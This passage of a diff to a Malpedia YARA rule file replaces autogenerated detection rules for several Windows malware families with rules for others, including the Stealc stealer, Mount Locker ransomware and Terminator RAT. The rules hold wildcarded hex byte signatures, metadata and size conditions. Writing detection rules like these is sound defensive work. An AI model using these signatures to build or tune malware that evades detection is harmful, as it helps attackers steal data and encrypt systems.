-		$sequence_3 = { 89d8 e8???????? 4889442458 48895c2448 488d05e3a61c00 0f1f00 e8???????? }
-		$sequence_4 = { 90 90 488d05e41e4200 e8???????? 90 488b4c2420 488b542418 }
-		$sequence_5 = { b909000000 488bbc2408060000 488bb42410060000 4c8d0575882700 41b91a000000 e8???????? 0f1f4000 }
-		$sequence_6 = { 31c0 31c9 31d2 31db e9???????? 4889d9 4889c3 }
-		$sequence_7 = { 48c740100f000000 488d0dca832500 48894808 833d????????00 7509 488905???????? eb0c }
-		$sequence_8 = { 4c8b842410010000 0f1f4000 e9???????? 4c8b842410010000 4d85c0 7e24 498d48ff }
-		$sequence_9 = { 4c89442478 0f1f00 4883fa01 7546 488d0573ca1a00 bb01000000 4889d9 }
+		$sequence_0 = { 68???????? 6801000080 ff15???????? 85c0 7556 }
+		$sequence_1 = { 68???????? c745f804010000 ff75fc ff15???????? ff75fc }
+		$sequence_2 = { 0f84d1000000 57 e8???????? 8d7c0302 c70424???????? }
+		$sequence_3 = { 55 8bec b82c410000 e8???????? 53 56 }
+		$sequence_4 = { 8d45f4 50 53 68???????? c745f804010000 }
+		$sequence_5 = { e8???????? b8???????? 8d8d90feffff 50 8945e8 e8???????? 3bc3 }
+		$sequence_6 = { 0f86a0000000 bf14410000 8d8568bbffff 57 53 }
+		$sequence_7 = { 3bf3 0f85a9000000 381f 0f84a1000000 8d85ecfeffff 68???????? 50 }
+		$sequence_8 = { 6a01 6a06 c645ff01 ff7620 }
+		$sequence_9 = { 80c261 88543724 46 83fe1f 7ce8 80643e2400 }
+		$sequence_10 = { e9???????? 83fe04 0f859afdffff 56 8d4508 }
+		$sequence_11 = { 66218514fbffff b981000000 8dbd16fbffff c745ec01000000 f3ab 66ab 8d45f4 }
+		$sequence_12 = { e8???????? 83c410 56 8d8514fbffff 6a00 }
+		$sequence_13 = { ab ab 33c0 8dbda6ebffff 6689b5a4ebffff }
+		$sequence_14 = { c3 53 e8???????? 59 ff75f0 ff15???????? }
+		$sequence_15 = { ffd7 85c0 7547 8d8514fbffff 85c0 }
 
 	condition:
-		7 of them and filesize < 10027008
+		7 of them and filesize < 1695744
 }
-rule MALPEDIA_Win_Risepro_Auto : FILE
+rule MALPEDIA_Win_Unidentified_106_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a15990c8-9753-5e87-a4b5-d8648a3a2e45"
+		id = "ea4969ee-e7d3-51c5-a790-866750e5961b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.risepro_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_106"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_106_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "27ab7b74bb4368f92b33ca48075a5bb9daa807fbe12d867a6bb9fe94c38b462c"
+		logic_hash = "d6bc870d9f53493eb97d63e12993bef0e39d6447b53eae3a48dc5e8a9f09d6c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100023,32 +100151,32 @@ rule MALPEDIA_Win_Risepro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb04 32c0 eb02 b001 8be5 5d }
-		$sequence_1 = { e8???????? 50 8d4de4 e8???????? ebdc 8d4de4 }
-		$sequence_2 = { 8b5508 8d0c4a 8d5514 e8???????? }
-		$sequence_3 = { 8995f0feffff b808000000 6bc800 8b95ccfeffff 8b840a8c000000 }
-		$sequence_4 = { 8b4de8 0fb79180000000 52 8b4508 50 8b4de8 e8???????? }
-		$sequence_5 = { c745fc00000000 c745d888bd4100 8b4de8 51 8b55d8 52 8d4def }
-		$sequence_6 = { 8b55c8 8955b0 8d45d8 50 }
-		$sequence_7 = { 8bc8 e8???????? 8945f8 e8???????? 8945f4 }
-		$sequence_8 = { 64a300000000 894dc4 8b4dc4 83c11c e8???????? }
-		$sequence_9 = { 2b45f0 3b45f4 7305 e8???????? 8a45fe }
+		$sequence_0 = { ff5040 89442440 85c0 780a c783f000000001000000 8b442440 4883c420 }
+		$sequence_1 = { ba64000c00 488bcf 4c8be8 ff96c0000000 4885c0 750d bfeaffffff }
+		$sequence_2 = { 83e27f 8d0432 413bc4 0f87e0fbffff 83fa04 0f87d7fbffff 85d2 }
+		$sequence_3 = { ffc0 4883c110 413bc5 72f0 33c9 e8???????? 488b4c2448 }
+		$sequence_4 = { e8???????? 488d9424f0000000 498bce e8???????? 488d4c2420 e8???????? 41b820000000 }
+		$sequence_5 = { 8bea 448b895c010000 448be2 412bf1 488bd9 2bee 85f6 }
+		$sequence_6 = { c7470801000000 0f57c0 4889442470 0f57c9 48896c2440 41b00b 48896c2448 }
+		$sequence_7 = { 85c0 7531 0fb7833c040000 6683e030 6683f810 7509 c683470400000a }
+		$sequence_8 = { 8b4a04 394c2460 7507 beffffffff eb62 ba07000300 48896c2478 }
+		$sequence_9 = { 7519 488d0598730800 c7450403000000 48898590000000 32c0 eb1f 488b5308 }
 
 	condition:
-		7 of them and filesize < 280576
+		7 of them and filesize < 27402240
 }
-rule MALPEDIA_Win_Splitloader_Auto : FILE
+rule MALPEDIA_Win_Dmsniff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1a1cb38c-8464-5fc4-a742-33ff9af7dc5d"
+		id = "e9b02a57-acfd-5696-afff-e1ad9ad00d2f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.splitloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.splitloader_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dmsniff_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "16d8d2ed74e30686bcfb5a681aebf6245d42317682bf1d1bc1fbb6f6c4392dc3"
+		logic_hash = "8d240517eec8ca9f146a8569ec7f531dfedcca5581430f505c0f5f429a443243"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100062,32 +100190,32 @@ rule MALPEDIA_Win_Splitloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c6817401000043 c681f701000043 488d0524910000 488981b8000000 b90d000000 e8???????? }
-		$sequence_1 = { 8bca 418984240cab0000 48014d10 85c0 790a b8fdffffff }
-		$sequence_2 = { 8b430c 8905???????? 8bd7 4c8d05f073ffff 89542420 83fa05 }
-		$sequence_3 = { 488bcf 4889742420 ff15???????? 4533c9 }
-		$sequence_4 = { 488be9 41be08000000 4d85e4 750e 418d46f6 4883c460 415e }
-		$sequence_5 = { 48897c2418 4154 4883ec20 4c8d25fc970000 33f6 }
-		$sequence_6 = { 750e 0f1f4000 4883c702 6644391f 74f6 }
-		$sequence_7 = { 8905???????? 8b430c 8905???????? 8bd7 4c8d05f073ffff 89542420 }
-		$sequence_8 = { eb9a 488d15df660000 488d0dc0660000 e8???????? 488d15dc660000 }
-		$sequence_9 = { 6644391f 750e 0f1f4000 4883c702 }
+		$sequence_0 = { 7316 8bbdfcfeffff 89fe 46 89b5fcfeffff 899cbd00ffffff 8d85f0feffff }
+		$sequence_1 = { d92c24 83c404 6a00 6a00 68???????? 68???????? }
+		$sequence_2 = { 50 8b10 ff5220 89c7 09ff 0f8563010000 6a00 }
+		$sequence_3 = { 50 8b10 ff5250 89c7 }
+		$sequence_4 = { 47 39f7 72d3 ff45fc 8b45f4 3945fc 72c2 }
+		$sequence_5 = { f7e7 8945ec 50 e8???????? 89c3 }
+		$sequence_6 = { 59 be0f000000 39c6 761a 68???????? e8???????? }
+		$sequence_7 = { 50 ff7508 e8???????? 68???????? e8???????? 50 ff7508 }
+		$sequence_8 = { e8???????? 68???????? e8???????? 89c2 6a00 }
+		$sequence_9 = { 89c3 81e3ff000000 89de 83c661 89f3 881d???????? b803000000 }
 
 	condition:
-		7 of them and filesize < 174080
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Vshell_Auto : FILE
+rule MALPEDIA_Win_Blackmagic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9d00442f-4008-5c2c-a89f-67c6ad34a468"
+		id = "9637b230-6b90-5402-8df5-d6a9a08385b0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vshell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vshell_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackmagic_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "af7100cec7361ef2656c4b43a7045079d3f82b2662234a4759041cc9664982f0"
+		logic_hash = "0682a81f91c82180ece20284a26ec164fbede145e670a9eec1710d6febfbedfc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100097,36 +100225,36 @@ rule MALPEDIA_Win_Vshell_Auto : FILE
 		malpedia_rule_date = "20260105"
 		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
 		malpedia_version = "20251219"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { e8???????? 90 bf01000000 90 e8???????? 488b942480000000 48894a70 }
-		$sequence_1 = { eb50 488b842498000000 48c740280b000000 eb3e 488b842428010000 488b9c2430010000 e8???????? }
-		$sequence_2 = { e8???????? 48c70019000000 e8???????? 4889c1 4889df 488d05419d5d00 488b9c2490000000 }
-		$sequence_3 = { eb1b 440fb64c3c27 418d3431 8d76cd 4088741427 4488443c27 4883c002 }
-		$sequence_4 = { eb38 488b8c2488000000 488b4110 e8???????? 4889c3 488d053d4ca100 488b6c2478 }
-		$sequence_5 = { eba7 4885c9 741c 48894c2440 48899c2498000000 31c0 31d2 }
-		$sequence_6 = { e8???????? e8???????? 4889842478040000 e8???????? 4889842470040000 48899c24d8010000 e8???????? }
-		$sequence_7 = { eb0c 488d3da654b000 e8???????? 4885db 7410 4889d8 4889cb }
-		$sequence_8 = { e8???????? eb38 488b7c2428 488b07 488b5f08 488b4f10 440f117f08 }
-		$sequence_9 = { c744242c4e67d48a 48ba22266cf93b139a0b 4889542418 c74424206ecc42ee 31c0 eb1a 0fb6540424 }
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 4c8d05aa2c0200 e8???????? 488bf0 4885c0 7412 488bc8 ff15???????? }
+		$sequence_1 = { 488bd7 488d8c2430010000 e8???????? 90 33d2 41b810010000 488d8c24e0010000 }
+		$sequence_2 = { 33db 49895bb8 885c2470 448d4317 488d15898a0400 498d4ba8 e8???????? }
+		$sequence_3 = { 488d4dd7 e8???????? 90 41b84d000000 488d159b810400 e8???????? 90 }
+		$sequence_4 = { 0f284587 488d154d1b0300 488d4d87 660f7f4587 e8???????? 488d5587 488d4c2440 }
+		$sequence_5 = { e8???????? 4885c0 7411 8a0e 488d1597120300 488910 884808 }
+		$sequence_6 = { 90 488d05437a0600 4889442428 488d4c2460 488d542468 488b442468 }
+		$sequence_7 = { 488b05???????? 488945d0 488b75f0 488975b8 488975d8 33c0 488985c0000000 }
+		$sequence_8 = { e8???????? 488bd8 488bc3 4883c430 415e 5f 5e }
+		$sequence_9 = { 488905???????? ff15???????? 483305???????? 488d1560360300 488bcb 488905???????? ff15???????? }
 
 	condition:
-		7 of them and filesize < 39452672
+		7 of them and filesize < 1416192
 }
-rule MALPEDIA_Win_Horus_Auto : FILE
+rule MALPEDIA_Win_Domino_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "69a4cf35-2806-517b-bb53-0add97c1f457"
+		id = "10f793c1-4d4b-5de7-9702-d644c24734c3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.horus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.horus_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.domino_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "98e7222b64c7a567c8f798abf5f3ca917bf88c189a0e21ef9e9894081482246f"
+		logic_hash = "e26eed1b473d3625fb435dacac72b22f0ae1cadfb46f5a5ee8d2f38a588ca275"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100140,32 +100268,32 @@ rule MALPEDIA_Win_Horus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b456f 3bc7 0f8458ffffff 488b757f 897d6f 8b456f 3bc7 }
-		$sequence_1 = { 57 4883ec20 488b19 488bf9 4885db 0f84de000000 488b7378 }
-		$sequence_2 = { 4c8945e8 488d4550 488945e0 65488b042560000000 488b4818 488b4110 488b08 }
-		$sequence_3 = { 480f499df0000000 4885db 742f 488d4307 b908000000 8000d9 48ffc8 }
-		$sequence_4 = { 488b5df8 eb02 33db 4885db 7429 488d4307 b908000000 }
-		$sequence_5 = { 4c8bc6 488bc8 33d2 ff15???????? 49833c2400 0f8494000000 bd01000000 }
-		$sequence_6 = { 83632c00 83633000 c7456f04fa0100 e9???????? 83637c00 488d4b04 488bd6 }
-		$sequence_7 = { 7457 3d21c40100 0f84d8000000 3d84c80100 0f85cf000000 488b4580 4885c0 }
-		$sequence_8 = { b803000000 c3 83792800 7427 488b5118 48837a0800 741c }
-		$sequence_9 = { 0f849e000000 3d45940100 7465 3d56a60100 7441 3dffdc0100 7424 }
+		$sequence_0 = { 41b800300000 488bd6 33c9 4c8bf6 ff15???????? }
+		$sequence_1 = { 488bd1 b940000000 ff15???????? 448b442438 }
+		$sequence_2 = { 7509 488b5b08 483b1f 75e9 }
+		$sequence_3 = { 488b4de7 ff15???????? 488b4def 33d2 ff15???????? 4c8d9c24a0000000 8bc3 }
+		$sequence_4 = { 488d942450010000 b904010000 ff15???????? 4c8d4c2440 }
+		$sequence_5 = { 7518 66c7030206 ff15???????? 894302 b806000000 e9???????? }
+		$sequence_6 = { 750f 66c7030101 b802000000 e9???????? 488d942450010000 b904010000 ff15???????? }
+		$sequence_7 = { ff15???????? 85c0 7434 488b4d7f }
+		$sequence_8 = { ff15???????? 488bf0 4885c0 7513 66c7030203 ff15???????? }
+		$sequence_9 = { ff15???????? 488bcf 894302 ff15???????? }
 
 	condition:
-		7 of them and filesize < 887808
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Terminator_Rat_Auto : FILE
+rule MALPEDIA_Win_Maoloa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a907b97c-e30c-569d-92f6-e3c29e0c0bce"
+		id = "afa3d79b-4a68-539f-9bf1-2fbe13d229d7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.terminator_rat_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maoloa_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "65d625611fed0b10063c05f198c3f84077666921d947cf7651a55c8e71d92a0f"
+		logic_hash = "6927aeeb8c5b24487b9e82b9c7317d430a704e39d7308aabba00107302314472"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100179,34 +100307,34 @@ rule MALPEDIA_Win_Terminator_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffb7e8feffff 8d854d010000 8987e8feffff 8b8541010000 c1e006 }
-		$sequence_1 = { c0c003 3441 c0c003 3452 c0c003 3443 }
-		$sequence_2 = { 6a04 bb00040000 57 53 6a00 }
-		$sequence_3 = { 53 56 8b7708 ff77fc ffb51d010000 8f47f4 }
-		$sequence_4 = { 8d4618 50 8b8539010000 03c1 50 e8???????? 8b4610 }
-		$sequence_5 = { 50 e8???????? 83f8ff 7408 81c400040000 }
-		$sequence_6 = { 8b4b0c ac 3459 c0c803 3448 c0c803 }
-		$sequence_7 = { 8f87f0fbffff 5e 5b 81c410040000 }
-		$sequence_8 = { e9???????? ff7610 8b8d35010000 8d4618 50 8b8539010000 03c1 }
-		$sequence_9 = { ff5541 50 ff5569 8bf0 }
+		$sequence_0 = { 8d4c241c e8???????? 8bf0 83c404 85f6 7524 0f10842468010000 }
+		$sequence_1 = { 90 ff0f 8d4dd8 33d2 e8???????? 8bf0 85f6 }
+		$sequence_2 = { 53 ff15???????? 85c0 7595 53 }
+		$sequence_3 = { 8b4d0c 81ff00040000 7615 5f b8fcffffff 5b 8b4dfc }
+		$sequence_4 = { 897018 8bcb 895d08 c1e918 89581c 0fb69998f14200 8b4d08 }
+		$sequence_5 = { 8b45f4 8d1c9f 338310100000 81c710100000 314df0 8945f4 8b45ac }
+		$sequence_6 = { 8d4dd8 33d2 e8???????? 8bf0 85f6 0f85dc010000 837dbc01 }
+		$sequence_7 = { c3 8b4d9c 53 52 33d2 e8???????? }
+		$sequence_8 = { 8bc6 c1e002 50 8b85b4f8ffff 0fb70485cc444200 8d0485c83b4200 }
+		$sequence_9 = { 8bf0 6a08 6a08 89742430 e8???????? 83c410 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 586752
 }
-rule MALPEDIA_Win_C0D0So0_Auto : FILE
+rule MALPEDIA_Win_Prikormka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aea7e5c4-8703-5b4f-a55a-e1b218098e9e"
+		id = "2d17b792-a768-56ab-af11-e8fba342d1c6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.c0d0so0_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.prikormka_auto.yar#L1-L417"
 		license_url = "N/A"
-		logic_hash = "0dd75833152df4b63946cc86c2ac389a4374b8155ffb49a46f2ef69869ec191b"
+		logic_hash = "ca50544df2308cc151f303c9210769038ba6545078bcd4dca147dd52915255ab"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -100218,32 +100346,68 @@ rule MALPEDIA_Win_C0D0So0_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a04 bf00200000 57 ff7350 ff7334 ffd6 }
-		$sequence_1 = { 837d0c00 7404 0006 eb02 2806 0fb6c0 }
-		$sequence_2 = { ff15???????? eb46 8d0c4e 8d0c4f }
-		$sequence_3 = { ff15???????? 85c0 7423 6683780802 }
-		$sequence_4 = { 33c0 5d c3 8b503c 813c1050450000 75f0 8bd7 }
-		$sequence_5 = { 7421 8345f814 8b45f8 6a14 83c0f0 50 }
-		$sequence_6 = { c1ea10 ff4dfc 8813 43 837dfc00 7fe7 8b5508 }
-		$sequence_7 = { 741f 4a 7417 4a 740f }
-		$sequence_8 = { eb62 8d45f4 50 57 8d45fc }
-		$sequence_9 = { 85c0 740f 8b00 47 89048e 41 }
+		$sequence_0 = { 8d0446 50 e8???????? 83c40c 6a00 56 }
+		$sequence_1 = { 6a00 56 ffd3 8b2d???????? 85c0 7405 }
+		$sequence_2 = { 8d1446 52 e8???????? 83c40c }
+		$sequence_3 = { 6800020000 ff15???????? 68???????? ffd7 03c0 50 68???????? }
+		$sequence_4 = { 51 e8???????? 83c40c 68???????? ffd7 }
+		$sequence_5 = { 85f6 7420 68???????? ffd7 }
+		$sequence_6 = { 6a00 56 ffd3 85c0 7405 6a02 56 }
+		$sequence_7 = { 740e 68???????? 50 ff15???????? ffd0 }
+		$sequence_8 = { 7408 41 42 3bce }
+		$sequence_9 = { 83c40c 8d442404 50 ff15???????? 5e 85c0 }
+		$sequence_10 = { 59 c3 50 ff15???????? b801000000 }
+		$sequence_11 = { 6a00 6a00 ff15???????? 85c0 7502 59 c3 }
+		$sequence_12 = { 0fb7c0 6683f805 7d09 b801000000 }
+		$sequence_13 = { c3 57 6a00 6a00 6a00 6a02 }
+		$sequence_14 = { 68???????? ff15???????? 0fb7c0 6683f805 }
+		$sequence_15 = { ff15???????? ffd0 c705????????01000000 c705????????01000000 }
+		$sequence_16 = { 5e 85c0 7422 68???????? 50 }
+		$sequence_17 = { 5e 85c0 7414 c705????????01000000 }
+		$sequence_18 = { 33f6 e8???????? e8???????? e8???????? e8???????? e8???????? e8???????? }
+		$sequence_19 = { 6685d2 75f5 2bce 8d1400 52 d1f9 }
+		$sequence_20 = { 8bf0 ff15???????? 3db7000000 751f }
+		$sequence_21 = { 50 e8???????? 8b2d???????? 83c40c 6a00 }
+		$sequence_22 = { 3db7000000 751f 56 ff15???????? 33c0 }
+		$sequence_23 = { 668b08 83c002 6685c9 75f5 8b0d???????? 2bc2 8b15???????? }
+		$sequence_24 = { d1f8 8d7102 8da42400000000 668b11 83c102 6685d2 }
+		$sequence_25 = { e8???????? 8b35???????? 83c40c 68???????? ffd6 03c0 }
+		$sequence_26 = { 50 e8???????? b8???????? 83c40c 8d5002 }
+		$sequence_27 = { 6685c9 75f5 8d0c12 2bc6 51 d1f8 8d544408 }
+		$sequence_28 = { 75f5 2bc6 8d0c12 51 d1f8 }
+		$sequence_29 = { 85c0 7409 6a02 68???????? }
+		$sequence_30 = { 52 0fb754241c 50 0fb7442422 }
+		$sequence_31 = { e8???????? 83c40c eb0d 6a00 6800020000 ff15???????? }
+		$sequence_32 = { 68???????? 33ff 57 57 ff15???????? 8bf0 }
+		$sequence_33 = { 68???????? ffd6 50 68???????? 57 ffd6 03c7 }
+		$sequence_34 = { 75f5 2bc2 b9???????? d1f8 8d7102 668b11 }
+		$sequence_35 = { 83c002 6685c9 75f5 2bc6 03d2 52 }
+		$sequence_36 = { 6685d2 75f5 8d1400 2bce 52 d1f9 }
+		$sequence_37 = { d1f8 8bd0 b8???????? 8d7002 }
+		$sequence_38 = { b8???????? 8d7002 8da42400000000 668b08 83c002 }
+		$sequence_39 = { 8b1d???????? 83c40c 6a00 68???????? }
+		$sequence_40 = { 50 e8???????? b9???????? 83c40c 8d5102 668b01 }
+		$sequence_41 = { c20400 6a0c b8???????? e8???????? 33c0 8945ec }
+		$sequence_42 = { 6a00 8d45f8 50 8d34fd0cde0110 ff36 e8???????? }
+		$sequence_43 = { 50 43 6a02 43 }
+		$sequence_44 = { 8d4514 50 e8???????? 53 8d4d00 }
+		$sequence_45 = { 3bfb 7d12 8b4de4 53 }
 
 	condition:
-		7 of them and filesize < 450560
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Shrinklocker_Auto : FILE
+rule MALPEDIA_Win_Mount_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2766ab1f-0f76-5831-84d1-b9f95003f3f6"
+		id = "2052c543-cb18-5d1a-a87c-7c9ba4a04469"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shrinklocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shrinklocker_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mount_locker_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "51a8eff3d0e892d08ca7cb6cb77d8a510f6bbf09ab967ba64d6200c00464e9c5"
+		logic_hash = "9773bfd51e99f33a259a570fd66a0ee2d45575bac793a3c37128b45245a677af"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100257,32 +100421,38 @@ rule MALPEDIA_Win_Shrinklocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a804 7409 488d1db94c0300 eb14 a802 488d1dc64c0300 488d05d74c0300 }
-		$sequence_1 = { 4803c8 488bc1 488b4d20 488b95d8000000 488d0c51 4c8bc0 488b4538 }
-		$sequence_2 = { 488b4c2460 898110170000 e9???????? 8b442468 ffc8 488b4c2460 4881c1bc000000 }
-		$sequence_3 = { 4c896310 4d8bc6 48897318 488bcf 4883fd0f 7648 488b33 }
-		$sequence_4 = { e8???????? 488b4c2430 48894c2420 4c8b4c2458 4c8b442460 488b4c2450 488b5110 }
-		$sequence_5 = { e8???????? 88442425 488b8c2480000000 488b09 48634904 488b942480000000 }
-		$sequence_6 = { eb58 b804000000 4869c000010000 488b4c2468 0fb70401 488b4c2460 8b8910170000 }
-		$sequence_7 = { 8b84815c270100 4803c1 ffe0 488b442430 83781000 7511 }
-		$sequence_8 = { 2500e00000 85c0 7424 488b842410010000 488d0de2300400 48894820 488b442430 }
-		$sequence_9 = { 488d54242f 488d4c2458 e8???????? 90 c644243011 488d542430 488d4c2458 }
+		$sequence_0 = { 498be8 4d8bc8 4c8bc2 4c8bf2 }
+		$sequence_1 = { f30f5905???????? 0f5ad0 66490f7ed0 e8???????? }
+		$sequence_2 = { 8bc8 81e10000ffff 81f900000780 7503 0fb7c0 3d2e050000 }
+		$sequence_3 = { 488b0b 41b902000000 4533c0 33d2 }
+		$sequence_4 = { 488d4df0 4889442428 4533c9 4533c0 }
+		$sequence_5 = { 4c8bc2 4c8bf2 8bf1 33d2 33c9 }
+		$sequence_6 = { 4c8b05???????? 488bcb 488b15???????? e8???????? }
+		$sequence_7 = { 4533c9 488b4c2458 33d2 c744243001000000 c744243c02000000 }
+		$sequence_8 = { ff15???????? 85c0 7509 f0ff05???????? }
+		$sequence_9 = { 7505 e8???????? 833d????????00 7409 833d????????00 }
+		$sequence_10 = { 7423 488b0d???????? 4885c9 7417 488364242000 4c8d4c2468 }
+		$sequence_11 = { 57 ff15???????? 8bd8 85db 7442 }
+		$sequence_12 = { 66894df8 668945f4 56 56 }
+		$sequence_13 = { 8b7c2414 8b35???????? bd???????? 8b15???????? 8bde 03df 89542414 }
+		$sequence_14 = { c3 6aff ff7508 e8???????? 68???????? }
+		$sequence_15 = { 59 59 5f 5e 33c0 5d }
 
 	condition:
-		7 of them and filesize < 10490880
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Lynx_Auto : FILE
+rule MALPEDIA_Win_Stealc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f38e4f00-aaca-5bf9-869c-83083f4fee5c"
+		id = "ff6aaa00-958c-53cc-ab33-0d5cc117632f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lynx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lynx_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stealc_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "830d0c044d086e873e93b41654d3296d5d83edd7251c856a6c1b1da8daa3d504"
+		logic_hash = "0abba8b26d40125f184d3d439be2ae9ffb7dbc4aae103ea542b0165f4c38fedb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100296,32 +100466,40 @@ rule MALPEDIA_Win_Lynx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4dec 0f1145ec e8???????? b90f000000 8d87bf000000 }
-		$sequence_1 = { 23d1 8b7df4 8bde 8955dc 81f3ffffff03 8b55f0 f7d3 }
-		$sequence_2 = { 038580fcffff 038574fdffff 898548fdffff 8d0433 898528fdffff 8b8558fdffff }
-		$sequence_3 = { e9???????? 83bb6801000000 8b4320 894308 8b4324 c7433400000000 89430c }
